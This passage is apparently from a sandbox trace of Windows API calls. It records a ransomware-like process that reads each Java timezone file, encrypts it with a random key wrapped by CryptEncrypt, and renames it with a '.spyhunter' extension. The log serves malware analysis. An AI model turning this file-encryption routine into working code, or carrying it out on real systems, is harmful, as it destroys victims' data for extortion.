hHeap=0x2c0000) returned 1 [0167.553] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.554] WriteFile (in: hFile=0x9c, lpBuffer=0x248e64c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e60c, lpOverlapped=0x0 | out: lpBuffer=0x248e64c*, lpNumberOfBytesWritten=0x248e60c*=0x4, lpOverlapped=0x0) returned 1 [0167.554] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e60c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e60c*=0x30, lpOverlapped=0x0) returned 1 [0167.554] CloseHandle (hObject=0x9c) returned 1 [0167.554] GetProcessHeap () returned 0x2c0000 [0167.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.554] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6CDT.spyhunter") returned 69 [0167.554] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6CDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6cdt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\CST6CDT.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\cst6cdt.spyhunter")) returned 1 [0167.558] GetProcessHeap () returned 0x2c0000 [0167.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.558] GetProcessHeap () returned 0x2c0000 [0167.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.558] GetProcessHeap () returned 0x2c0000 [0167.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7c78 | out: hHeap=0x2c0000) returned 1 [0167.558] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e648 | out: pbBuffer=0x248e648) returned 1 [0167.558] GetProcessHeap () returned 0x2c0000 [0167.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.559] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e640*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e640*=0x30) returned 1 [0167.559] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Nauru" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\nauru"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.685] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Nauru") returned 57 [0167.685] StrStrW (lpFirst="Nauru", lpSrch=".txt") returned 0x0 [0167.685] GetProcessHeap () returned 0x2c0000 [0167.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.685] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e604, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e604*=0x61, lpOverlapped=0x0) returned 1 [0167.687] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.687] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x61, lpNumberOfBytesWritten=0x248e604, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e604*=0x61, lpOverlapped=0x0) returned 1 [0167.687] GetProcessHeap () returned 0x2c0000 [0167.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.687] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.687] WriteFile (in: hFile=0x9c, lpBuffer=0x248e644*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e604, lpOverlapped=0x0 | out: lpBuffer=0x248e644*, lpNumberOfBytesWritten=0x248e604*=0x4, lpOverlapped=0x0) returned 1 [0167.687] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e604, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e604*=0x30, lpOverlapped=0x0) returned 1 [0167.687] CloseHandle (hObject=0x9c) returned 1 [0167.687] GetProcessHeap () returned 0x2c0000 [0167.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.687] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Nauru.spyhunter") returned 67 [0167.688] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Nauru" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\nauru"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Nauru.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\nauru.spyhunter")) returned 1 [0167.688] GetProcessHeap () returned 0x2c0000 [0167.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.689] GetProcessHeap () returned 0x2c0000 [0167.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.689] GetProcessHeap () returned 0x2c0000 [0167.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3c40 | out: hHeap=0x2c0000) returned 1 [0167.689] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e648 | out: pbBuffer=0x248e648) returned 1 [0167.689] GetProcessHeap () returned 0x2c0000 [0167.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.689] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e640*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e640*=0x30) returned 1 [0167.689] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Midway" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\midway"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.690] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Midway") returned 58 [0167.690] StrStrW (lpFirst="Midway", lpSrch=".txt") returned 0x0 [0167.690] GetProcessHeap () returned 0x2c0000 [0167.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.691] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e604, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e604*=0x59, lpOverlapped=0x0) returned 1 [0167.691] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffa7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.691] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x248e604, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e604*=0x59, lpOverlapped=0x0) returned 1 [0167.691] GetProcessHeap () returned 0x2c0000 [0167.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.692] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.692] WriteFile (in: hFile=0x9c, lpBuffer=0x248e644*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e604, lpOverlapped=0x0 | out: lpBuffer=0x248e644*, lpNumberOfBytesWritten=0x248e604*=0x4, lpOverlapped=0x0) returned 1 [0167.692] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e604, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e604*=0x30, lpOverlapped=0x0) returned 1 [0167.692] CloseHandle (hObject=0x9c) returned 1 [0167.692] GetProcessHeap () returned 0x2c0000 [0167.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.692] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Midway.spyhunter") returned 68 [0167.692] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Midway" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\midway"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Midway.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\midway.spyhunter")) returned 1 [0167.693] GetProcessHeap () returned 0x2c0000 [0167.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.693] GetProcessHeap () returned 0x2c0000 [0167.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.693] GetProcessHeap () returned 0x2c0000 [0167.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3b80 | out: hHeap=0x2c0000) returned 1 [0167.693] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e640 | out: pbBuffer=0x248e640) returned 1 [0167.693] GetProcessHeap () returned 0x2c0000 [0167.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.694] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e638*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e638*=0x30) returned 1 [0167.694] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Marquesas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\marquesas"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.695] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Marquesas") returned 61 [0167.695] StrStrW (lpFirst="Marquesas", lpSrch=".txt") returned 0x0 [0167.695] GetProcessHeap () returned 0x2c0000 [0167.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.695] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e5fc*=0x41, lpOverlapped=0x0) returned 1 [0167.696] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.696] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x248e5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e5fc*=0x41, lpOverlapped=0x0) returned 1 [0167.696] GetProcessHeap () returned 0x2c0000 [0167.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.696] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.696] WriteFile (in: hFile=0x9c, lpBuffer=0x248e63c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5fc, lpOverlapped=0x0 | out: lpBuffer=0x248e63c*, lpNumberOfBytesWritten=0x248e5fc*=0x4, lpOverlapped=0x0) returned 1 [0167.696] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5fc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5fc*=0x30, lpOverlapped=0x0) returned 1 [0167.696] CloseHandle (hObject=0x9c) returned 1 [0167.696] GetProcessHeap () returned 0x2c0000 [0167.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.697] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Marquesas.spyhunter") returned 71 [0167.697] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Marquesas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\marquesas"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Marquesas.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\marquesas.spyhunter")) returned 1 [0167.698] GetProcessHeap () returned 0x2c0000 [0167.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.698] GetProcessHeap () returned 0x2c0000 [0167.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.698] GetProcessHeap () returned 0x2c0000 [0167.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4c00 | out: hHeap=0x2c0000) returned 1 [0167.698] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e640 | out: pbBuffer=0x248e640) returned 1 [0167.698] GetProcessHeap () returned 0x2c0000 [0167.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.698] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e638*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e638*=0x30) returned 1 [0167.698] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Majuro" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\majuro"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.699] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Majuro") returned 58 [0167.699] StrStrW (lpFirst="Majuro", lpSrch=".txt") returned 0x0 [0167.699] GetProcessHeap () returned 0x2c0000 [0167.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.699] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e5fc*=0x4d, lpOverlapped=0x0) returned 1 [0167.700] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.700] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x248e5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e5fc*=0x4d, lpOverlapped=0x0) returned 1 [0167.700] GetProcessHeap () returned 0x2c0000 [0167.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.700] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.700] WriteFile (in: hFile=0x9c, lpBuffer=0x248e63c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5fc, lpOverlapped=0x0 | out: lpBuffer=0x248e63c*, lpNumberOfBytesWritten=0x248e5fc*=0x4, lpOverlapped=0x0) returned 1 [0167.700] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5fc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5fc*=0x30, lpOverlapped=0x0) returned 1 [0167.701] CloseHandle (hObject=0x9c) returned 1 [0167.701] GetProcessHeap () returned 0x2c0000 [0167.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.701] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Majuro.spyhunter") returned 68 [0167.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Majuro" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\majuro"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Majuro.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\majuro.spyhunter")) returned 1 [0167.702] GetProcessHeap () returned 0x2c0000 [0167.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.702] GetProcessHeap () returned 0x2c0000 [0167.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.702] GetProcessHeap () returned 0x2c0000 [0167.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3ac0 | out: hHeap=0x2c0000) returned 1 [0167.702] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e638 | out: pbBuffer=0x248e638) returned 1 [0167.702] GetProcessHeap () returned 0x2c0000 [0167.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.702] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e630*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e630*=0x30) returned 1 [0167.702] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kwajalein" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kwajalein"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.704] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kwajalein") returned 61 [0167.704] StrStrW (lpFirst="Kwajalein", lpSrch=".txt") returned 0x0 [0167.704] GetProcessHeap () returned 0x2c0000 [0167.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.704] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e5f4*=0x59, lpOverlapped=0x0) returned 1 [0167.705] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffa7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.705] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x248e5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e5f4*=0x59, lpOverlapped=0x0) returned 1 [0167.705] GetProcessHeap () returned 0x2c0000 [0167.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.705] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.705] WriteFile (in: hFile=0x9c, lpBuffer=0x248e634*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5f4, lpOverlapped=0x0 | out: lpBuffer=0x248e634*, lpNumberOfBytesWritten=0x248e5f4*=0x4, lpOverlapped=0x0) returned 1 [0167.705] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5f4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5f4*=0x30, lpOverlapped=0x0) returned 1 [0167.705] CloseHandle (hObject=0x9c) returned 1 [0167.705] GetProcessHeap () returned 0x2c0000 [0167.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.706] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kwajalein.spyhunter") returned 71 [0167.706] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kwajalein" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kwajalein"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kwajalein.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kwajalein.spyhunter")) returned 1 [0167.707] GetProcessHeap () returned 0x2c0000 [0167.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.707] GetProcessHeap () returned 0x2c0000 [0167.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.707] GetProcessHeap () returned 0x2c0000 [0167.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4b38 | out: hHeap=0x2c0000) returned 1 [0167.707] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e638 | out: pbBuffer=0x248e638) returned 1 [0167.707] GetProcessHeap () returned 0x2c0000 [0167.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.707] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e630*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e630*=0x30) returned 1 [0167.707] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kosrae" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kosrae"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.710] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kosrae") returned 58 [0167.710] StrStrW (lpFirst="Kosrae", lpSrch=".txt") returned 0x0 [0167.710] GetProcessHeap () returned 0x2c0000 [0167.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.710] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e5f4*=0x55, lpOverlapped=0x0) returned 1 [0167.711] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.711] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x248e5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e5f4*=0x55, lpOverlapped=0x0) returned 1 [0167.711] GetProcessHeap () returned 0x2c0000 [0167.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.711] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.711] WriteFile (in: hFile=0x9c, lpBuffer=0x248e634*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5f4, lpOverlapped=0x0 | out: lpBuffer=0x248e634*, lpNumberOfBytesWritten=0x248e5f4*=0x4, lpOverlapped=0x0) returned 1 [0167.712] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5f4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5f4*=0x30, lpOverlapped=0x0) returned 1 [0167.712] CloseHandle (hObject=0x9c) returned 1 [0167.712] GetProcessHeap () returned 0x2c0000 [0167.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.712] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kosrae.spyhunter") returned 68 [0167.712] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kosrae" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kosrae"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kosrae.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kosrae.spyhunter")) returned 1 [0167.713] GetProcessHeap () returned 0x2c0000 [0167.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.713] GetProcessHeap () returned 0x2c0000 [0167.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.713] GetProcessHeap () returned 0x2c0000 [0167.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3a00 | out: hHeap=0x2c0000) returned 1 